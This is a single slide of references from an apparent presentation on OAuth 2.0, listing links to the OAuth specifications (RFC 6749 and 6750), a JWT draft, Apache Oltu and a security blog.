  • 41. References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/